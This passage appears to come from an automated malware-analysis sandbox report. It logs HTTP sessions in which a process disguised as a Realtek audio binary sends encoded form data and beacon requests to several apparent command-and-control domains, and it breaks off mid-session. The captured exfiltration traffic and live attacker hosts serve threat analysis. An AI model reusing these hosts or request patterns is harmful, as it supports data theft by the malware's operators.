                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd14253f34a57e-MIA
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=124062&min_rtt=124062&rtt_var=62031&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                  Data Ascii: 14
                                                                                  Dec 4, 2024 17:12:33.802191973 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.11.2049737172.67.180.246807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:36.065715075 CET1289OUTPOST /2nga/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.beylikduzu616161.xyz
                                                                                  Origin: http://www.beylikduzu616161.xyz
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 30 78 55 31 59 73 49 69 68 65 2f 34 32 6b 79 57 45 4b 6d 4f 36 46 4e 48 71 62 33 36 36 44 58 66 61 75 6d 36 4f 2f 64 4e 69 48 57 65 30 57 41 58 48 4e 78 6a 6e 4b 55 4b 32 34 58 6e 50 31 4c 65 4b 53 32 57 67 6f 33 6b 33 6b 66 72 54 75 54 73 4a 57 5a 34 6e 2b 50 73 34 2f 69 48 4c 6c 2f 65 4c 53 6e 45 46 73 69 62 6d 52 67 74 75 44 66 53 51 69 62 57 42 4d 4a 56 32 63 43 64 6a 6b 4e 71 33 52 61 75 54 77 6e 34 43 56 33 55 55 6d 6e 31 64 46 5a 55 47 7a 76 6c 63 71 33 66 76 41 46 37 64 71 78 6f 33 6c 74 62 56 32 61 56 4f 61 49 71 68 4f 54 2b 65 44 56 62 4f 37 36 51 49 66 76 6f 35 62 61 61 49 47 47 54 51 51 71 39 61 73 4d 37 31 48 6f 49 2f 63 43 76 52 31 38 61 7a 72 44 57 78 55 6a 7a 69 77 51 38 75 30 2b 38 2b 6e 39 66 78 59 65 55 4f 5a 4a 70 32 56 64 51 48 59 52 36 41 64 37 64 6c 42 6b 44 2f 48 6f 6d 6f 54 74 35 32 2f 45 75 72 46 45 6e 6f 34 2b 6c 56 33 70 51 4e 36 37 68 [TRUNCATED]
                                                                                  Data Ascii: IUY=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g0xU1YsIihe/42kyWEKmO6FNHqb366DXfaum6O/dNiHWe0WAXHNxjnKUK24XnP1LeKS2Wgo3k3kfrTuTsJWZ4n+Ps4/iHLl/eLSnEFsibmRgtuDfSQibWBMJV2cCdjkNq3RauTwn4CV3UUmn1dFZUGzvlcq3fvAF7dqxo3ltbV2aVOaIqhOT+eDVbO76QIfvo5baaIGGTQQq9asM71HoI/cCvR18azrDWxUjziwQ8u0+8+n9fxYeUOZJp2VdQHYR6Ad7dlBkD/HomoTt52/EurFEno4+lV3pQN67hk/A59Xi0QRNAl4BpWA6t+evbVjVvQakFlhjcc9BRP2IbhEbzCg89LPYxiMMaFgaqXo5y/epPpxkTrAZJCkF9+ZzGv1bb7yAFCSkEm4bDfTmsxGxwd/XH8Nwle4E2tdAFqOW6vvaChbOlEJvrAO0w6RCeeiTrYwP8LebpuH3NCC+6fiLhsZUxaJNoeBTOTHvPJ+Y8tutOuxhaFS7vFDoF8dFdZrZED1nYx2nuMjYksq+LVlz/x4BeB7kCGo6IDh7xB7PLg/pb98YHP2cdKMyYwg01xcFGRWDja64U0fVF92CC5vGYTIejh6c3vojug/3N6TWbdoxzXT4ULnS6g7yDaYRtiuQ3cWDrUBdz0f/k6hNQgVU39+Y0
                                                                                  Dec 4, 2024 17:12:36.065758944 CET1289OUTData Raw: 34 70 6c 79 69 65 50 6e 76 55 75 72 74 4c 32 75 31 43 35 37 6f 33 66 54 2b 35 61 47 45 6d 4a 48 7a 37 68 6b 78 54 66 55 47 2f 72 6c 67 6d 7a 49 4c 57 58 76 34 6d 59 74 32 47 57 58 41 7a 67 31 41 4f 44 48 55 45 62 6d 52 68 50 34 6b 64 75 6a 4f 73
                                                                                  Data Ascii: 4plyiePnvUurtL2u1C57o3fT+5aGEmJHz7hkxTfUG/rlgmzILWXv4mYt2GWXAzg1AODHUEbmRhP4kdujOsftnAMCTxiHbkh/+A8MmhQz4YrCnizDAV3iPzet5xBLTYc3yXzIid/M6iXKC/IgupH7kj6KYLAeFDUYBxiUuMvuzcK4W4qSGqXkk+6XMUEXim+1hzP2WvMVo30FwfCHapFEATyLFNZDDkkIVQV7BgKw69xzsw8NRJR
                                                                                  Dec 4, 2024 17:12:36.065809011 CET5369OUTData Raw: 55 51 59 5a 2b 42 62 62 66 62 68 71 79 36 79 49 73 6c 63 58 4e 33 30 38 74 6e 72 73 58 41 6b 76 59 78 31 6c 33 55 4a 4c 41 6c 77 79 39 73 67 51 4d 69 58 66 37 79 42 7a 76 6f 76 31 67 4c 54 38 51 50 6b 77 4f 38 71 42 56 48 2f 6d 4e 77 4d 4a 64 6e
                                                                                  Data Ascii: UQYZ+Bbbfbhqy6yIslcXN308tnrsXAkvYx1l3UJLAlwy9sgQMiXf7yBzvov1gLT8QPkwO8qBVH/mNwMJdnSJLYvYJOjKOD6FnYpvZ8QwYkpPb0SffBqz9Z75Y14SHp8jtMis1dp0SnTboLnrS9krph9NGT3UvcK1HL5qRHhCWgoZvoiyu7qgI9itTzXtoN6xyTPytbvOkZ9Kq72ajjqVe4xcaL0lp4SDVTtiY2zOj8+z+RinjOc
                                                                                  Dec 4, 2024 17:12:36.501158953 CET854INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=syZ4VzyrhObnBRyWx8cIIMNSYbggDU6tJb64elS9w9biopTzhEv%2BJVMiMczaFBv%2FsNLxMYbxVimhQlhAaxgvLMEjSxJhfDWIC631p541TNrMEliwjk%2FgV9RWloGAFxc%2B4F9A9FpDdwbqRzw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd1435cc71875d-MIA
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=123922&min_rtt=123922&rtt_var=61961&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7947&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                  Data Ascii: 14
                                                                                  Dec 4, 2024 17:12:36.501204014 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.11.2049738172.67.180.246807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:38.726933956 CET496OUTGET /2nga/?h7i-=tZtx&IUY=Q2EbwnYhq4vEVEYxQpA6sukiKEquLN4lBliPtc8X0AIyDwowOCFGn/261E09vvaaF3LvgpjgW8Wvr6GWd63UOpRMNSn6wTuIcZ+YR2jjC7j32XIp3HKhGr0= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.beylikduzu616161.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:12:39.110443115 CET804INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdrtTe6J4nBURuYGFwHr2k9LglqosZeL8Dp66abj9mtesTqTWGRRO3gfIZsZJQTgh1EXJkVP1AzyFmn8va6sPsjSbe631sWbDyhLgI1CbX9vU7DgdJ8JMEKVb%2BukWc%2BE1ccNZyAGmbs9Eqo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd14466b71742e-MIA
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=124137&min_rtt=124137&rtt_var=62068&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.11.2049739118.107.250.103807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:44.841566086 CET745OUTPOST /gxyh/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.zxyck.net
                                                                                  Origin: http://www.zxyck.net
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.zxyck.net/gxyh/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 64 2f 45 77 78 34 44 52 6f 79 68 6a 4c 45 76 36 34 43 64 6b 6d 7a 4e 65 4d 53 71 38 33 54 70 6a 78 31 59 6c 69 4e 71 47 63 58 68 55 76 2f 34 4f 64 4e 4d 4a 65 64 68 64 53 79 6b 2b 4b 31 52 55 6f 37 59 6e 4c 62 4c 7a 79 67 4d 42 59 71 45 35 44 73 42 6e 67 37 6f 6f 78 35 38 71 78 6c 43 73 62 55 79 69 37 41 32 68 56 74 74 69 6c 48 4d 4d 4b 34 4a 43 75 5a 2f 5a 6a 58 38 6e 6a 57 38 77 38 31 37 69 49 64 77 32 64 6d 47 54 30 6b 72 34 74 5a 35 4e 37 58 77 35 35 4a 55 30 44 36 2f 2f 6d 72 56 38 55 4d 66 4b 65 77 63 69 46 63 74 53 4e 79 37 4a 4c 51 3d 3d
                                                                                  Data Ascii: IUY=8gHotV00muxVd/Ewx4DRoyhjLEv64CdkmzNeMSq83Tpjx1YliNqGcXhUv/4OdNMJedhdSyk+K1RUo7YnLbLzygMBYqE5DsBng7oox58qxlCsbUyi7A2hVttilHMMK4JCuZ/ZjX8njW8w817iIdw2dmGT0kr4tZ5N7Xw55JU0D6//mrV8UMfKewciFctSNy7JLQ==
                                                                                  Dec 4, 2024 17:12:45.190063953 CET308INHTTP/1.1 200 OK
                                                                                  Server: Tengine
                                                                                  Date: Wed, 04 Dec 2024 16:11:38 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2e///l=,0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.11.2049740118.107.250.103807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:47.716725111 CET765OUTPOST /gxyh/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.zxyck.net
                                                                                  Origin: http://www.zxyck.net
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.zxyck.net/gxyh/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 39 6a 77 51 6b 6c 77 38 71 47 66 58 68 55 6b 66 35 4b 54 74 4d 53 65 64 6b 69 53 78 38 2b 4b 31 46 55 6f 35 51 6e 4c 4b 4c 79 67 41 4d 48 51 4b 45 2f 48 73 42 6e 67 37 6f 6f 78 35 6f 41 78 6c 61 73 61 6b 43 69 30 43 65 2b 57 74 74 68 78 58 4d 4d 4f 34 49 71 75 5a 2f 33 6a 54 39 76 6a 51 34 77 38 77 66 69 49 73 77 78 45 32 47 5a 37 45 72 71 68 35 30 55 39 44 34 74 39 4f 4d 50 4c 61 7a 52 6a 39 59 6d 4a 2b 72 75 64 6a 41 51 42 73 55 36 50 77 36 53 57 65 58 66 37 69 50 6a 43 50 39 68 32 49 31 41 30 79 38 42 79 44 55 3d
                                                                                  Data Ascii: IUY=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3h9jwQklw8qGfXhUkf5KTtMSedkiSx8+K1FUo5QnLKLygAMHQKE/HsBng7oox5oAxlasakCi0Ce+WtthxXMMO4IquZ/3jT9vjQ4w8wfiIswxE2GZ7Erqh50U9D4t9OMPLazRj9YmJ+rudjAQBsU6Pw6SWeXf7iPjCP9h2I1A0y8ByDU=
                                                                                  Dec 4, 2024 17:12:48.055949926 CET308INHTTP/1.1 200 OK
                                                                                  Server: Tengine
                                                                                  Date: Wed, 04 Dec 2024 16:11:41 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2e///l=,0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.11.2049741118.107.250.103807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:50.603223085 CET3867OUTPOST /gxyh/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.zxyck.net
                                                                                  Origin: http://www.zxyck.net
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.zxyck.net/gxyh/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 38 67 48 6f 74 56 30 30 6d 75 78 56 66 66 30 77 32 5a 44 52 75 53 68 69 56 30 76 36 71 43 64 67 6d 7a 42 65 4d 54 2f 68 33 68 6c 6a 77 6d 77 6c 68 72 47 47 65 58 68 55 6e 66 35 4a 54 74 4e 49 65 5a 49 6d 53 32 31 44 4b 33 39 55 70 62 6f 6e 65 4f 58 79 35 77 4d 48 63 71 45 36 44 73 42 79 67 37 34 6b 78 35 34 41 78 6c 61 73 61 6d 61 69 77 51 32 2b 61 4e 74 69 6c 48 4d 32 4b 34 4a 48 75 5a 47 4b 6a 54 77 4e 69 67 59 77 38 51 50 69 4b 2b 59 78 62 6d 47 66 38 45 71 35 68 35 34 78 39 44 4d 50 39 4b 45 70 4c 62 72 52 75 6f 39 73 4e 2f 37 6c 41 6b 73 41 4b 2f 46 47 45 32 53 44 59 65 66 6e 38 6a 6a 4b 46 4b 74 4a 30 75 77 4a 68 6a 51 46 67 33 75 58 6a 56 53 69 73 52 68 42 62 41 63 6b 44 36 46 74 4b 35 4e 6b 39 46 70 48 79 66 50 34 2b 44 4c 63 2b 5a 53 36 38 62 46 77 34 6b 44 2f 63 4a 46 71 31 6e 4c 64 46 71 41 34 34 65 38 6d 76 4e 47 37 4e 37 30 66 4e 50 77 78 35 5a 58 58 46 4b 4d 38 6d 77 6b 4a 54 55 55 76 37 6e 50 4f 64 36 4d 6f 6c 49 5a 39 55 72 54 54 39 76 38 38 36 78 31 54 66 31 36 51 6f 76 [TRUNCATED]
                                                                                  Data Ascii: IUY=8gHotV00muxVff0w2ZDRuShiV0v6qCdgmzBeMT/h3hljwmwlhrGGeXhUnf5JTtNIeZImS21DK39UpboneOXy5wMHcqE6DsByg74kx54AxlasamaiwQ2+aNtilHM2K4JHuZGKjTwNigYw8QPiK+YxbmGf8Eq5h54x9DMP9KEpLbrRuo9sN/7lAksAK/FGE2SDYefn8jjKFKtJ0uwJhjQFg3uXjVSisRhBbAckD6FtK5Nk9FpHyfP4+DLc+ZS68bFw4kD/cJFq1nLdFqA44e8mvNG7N70fNPwx5ZXXFKM8mwkJTUUv7nPOd6MolIZ9UrTT9v886x1Tf16QovRC7whIvn0xjGabw1/K14+TvvfX9oSxy7ryW5Ai+5k0XNdG9g00V4UvtcqoOoX15t0cgqO9kbqVnVLSravR1EXt/2wONjR2U/dm28/f5VCCkaRzFZ1Px451nMYu2m9rjFxywTl14YzOHQK21vzVxibcO3bwxHGU7DxHlKMtR0FQdyf5IvrWgWRQqMevojK9Iu4JAuKAqksuyhGGb6Cuge9puVU3Mj/+sUBx8eLYJodRuIAdHKfFrl4FH5YJ6sPMNdhQA7bt/7kSkYdwkQcURmcbONrUyvlYSFNbrMGTOc2Ho4xfe9qRFor/hdnHtmCTeCjGJE2O2V20gKwsDkV0Nck9cUQp+egzV+RzSb7Fb5pF9tRzRSC0kebm0jgCooeyLBHbQTbueofP2/O1SX9ub/KdkK2+KsN5A3Qud0RXywmbcDQUOTMUeWIcRlV3KVc3J+8/dcAXE9ppjlUM4kXge9dzr1YO8emvID5aXFq5gm7bMV0WEvkYL3ZJaCgllb4Bw07/49wlZgUY8Ne7Ayz/rCCZsfIZPzDBy4Mja+xavCPJgI/XzwrXoQEUSywbIjUdWFiuMn73SMtqU4MsEDibJXvFEo5fOCEunNeeDCtZyH5xRIRhf39jbAuhya9/zSVYKGVtvRN/Zf6MxrP8yDsFCskkPC+gNgMaJV73 [TRUNCATED]
                                                                                  Dec 4, 2024 17:12:50.603271961 CET4047OUTData Raw: 32 79 38 51 37 7a 50 62 52 54 53 49 43 53 33 4a 2f 79 58 36 4b 68 41 74 47 56 54 6a 78 77 69 53 6b 79 73 39 51 74 34 38 37 53 56 52 52 76 7a 36 50 31 58 61 4a 61 2b 41 54 53 6a 7a 41 57 45 39 71 57 6a 63 65 64 4c 2f 4f 6e 56 6c 76 64 6a 75 4e 4c
                                                                                  Data Ascii: 2y8Q7zPbRTSICS3J/yX6KhAtGVTjxwiSkys9Qt487SVRRvz6P1XaJa+ATSjzAWE9qWjcedL/OnVlvdjuNLxczQVARnrNpzc6AbZl3FGax7Rcuww1ErM3d5NQK+daVbfHYeeh4vMv8Yhfgg75WR8A+wJXRW4sBsLko1EFV/+/YowZGvqt0R6O0VPQ+vWXy0FvCgJVrtnbDNNZfvptS9iAbOJGeodpxohX4bQGolkR0FbgwR1pova
                                                                                  Dec 4, 2024 17:12:50.952694893 CET308INHTTP/1.1 200 OK
                                                                                  Server: Tengine
                                                                                  Date: Wed, 04 Dec 2024 16:11:44 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc d4 12 fd f4 8a ca 0c 3d 00 b4 92 fd 2c 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2e///l=,0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.11.2049742118.107.250.103807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:53.473718882 CET485OUTGET /gxyh/?IUY=xivIugper8hSVuoO04jTuRZuLjO4xxMGnAUBMzrp/j5qvAoCvNj6F2x9r/oRQ/YEeKRSLhAnFUBxmqELIOT+5QAFQKguKJNKmb5QmpQkz0/MRH6o2CbFa8M=&h7i-=tZtx HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.zxyck.net
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:12:53.821280003 CET266INHTTP/1.1 200 OK
                                                                                  Server: Tengine
                                                                                  Date: Wed, 04 Dec 2024 16:11:47 GMT
                                                                                  Content-Type: text/html;charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 67 78 79 68 2e 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 1c/www/wwwroot/zxyck.net/gxyh.0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.11.2049743209.74.77.109807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:12:59.314080000 CET760OUTPOST /n9b0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dailyfuns.info
                                                                                  Origin: http://www.dailyfuns.info
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.dailyfuns.info/n9b0/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 4e 2b 39 4c 70 45 58 59 45 2f 47 38 49 47 33 42 44 6c 77 34 6a 6e 4d 64 35 76 78 2b 4a 50 69 6c 69 71 64 69 39 79 59 4a 61 56 68 50 71 76 6e 62 41 79 4f 78 7a 72 58 32 56 69 37 59 5a 69 59 47 39 33 6d 6b 4b 44 4b 69 6c 50 4c 41 68 4f 69 2b 36 34 34 41 36 63 42 30 57 45 57 70 6f 68 6d 34 6d 4e 77 65 64 64 47 74 6c 46 38 5a 62 55 65 50 4b 38 75 33 74 31 54 71 76 36 65 48 6d 45 76 65 6f 6f 77 76 48 46 4e 32 39 34 4e 54 75 61 35 76 37 6a 54 6f 46 4e 77 6d 72 34 73 67 6e 77 4c 75 37 76 48 49 6b 50 76 71 6e 67 31 75 4e 34 6c 52 38 49 63 55 66 56 4d 65 4e 42 4b 77 55 6d 69 51 6f 77 3d 3d
                                                                                  Data Ascii: IUY=N+9LpEXYE/G8IG3BDlw4jnMd5vx+JPiliqdi9yYJaVhPqvnbAyOxzrX2Vi7YZiYG93mkKDKilPLAhOi+644A6cB0WEWpohm4mNweddGtlF8ZbUePK8u3t1Tqv6eHmEveoowvHFN294NTua5v7jToFNwmr4sgnwLu7vHIkPvqng1uN4lR8IcUfVMeNBKwUmiQow==
                                                                                  Dec 4, 2024 17:12:59.505703926 CET533INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:12:59 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.11.2049744209.74.77.109807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:02.028086901 CET780OUTPOST /n9b0/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
